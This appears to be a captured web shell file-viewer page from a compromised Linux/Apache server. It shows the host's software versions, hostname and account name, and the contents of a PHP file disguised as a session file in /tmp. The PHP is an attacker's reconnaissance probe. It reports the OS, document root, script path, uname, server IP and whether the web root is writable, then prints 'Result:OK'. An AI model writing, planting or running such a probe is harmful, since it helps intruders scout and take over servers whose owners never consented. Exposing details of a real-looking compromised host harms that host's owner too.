HEX
Server: Apache/2.4.62 (Unix) OpenSSL/1.1.1k
System: Linux ns565604.ip-54-39-133.net 4.18.0-553.50.1.el8_10.x86_64 #1 SMP Tue Apr 15 08:09:22 EDT 2025 x86_64
User: greer489 (1034)
PHP: 8.3.19
Disabled: NONE
Upload Files
File: //tmp/sess_e843a7f6d899d35e08ea9d2b7bdbeb9c
<?php echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'></head><body>";$ip = $_SERVER["SERVER_ADDR"]; if(empty($ip)) $ip = @gethostbyname($_SERVER["SERVER_NAME"]);$root = $_SERVER["DOCUMENT_ROOT"]; $root = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;$fname = basename(__FILE__);$dir = getcwd(); $dir = rtrim($dir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;$os = (strtolower(substr(PHP_OS,0,3)) == "win") ? "WIN":"NIX";$console = 0;$curl = 0;print("OS:" . $os . "<br>");print("DR:" . str_replace("\\", "/", $root) . "<br>");print("SF:" . str_replace("\\", "/", $_SERVER["SCRIPT_FILENAME"]) . "<br>");print("SDT:" . @date("Y-m-d H:i:s", @filemtime($_SERVER["SCRIPT_FILENAME"])) . "<br>");print("DIR:" . str_replace("\\", "/", $dir) . "<br>");print("UNAME:" . (function_exists("php_uname") ? @php_uname() : "") . "<br>");print("IP:" . $ip . "<br>");print("RW:" . (is_writable($root) ? "1":"0") . "<br>");print("CE:" . $console . "<br>");print("CURL:" . $curl . "<br>");echo "Result:OK"; echo "</body></html>";  die;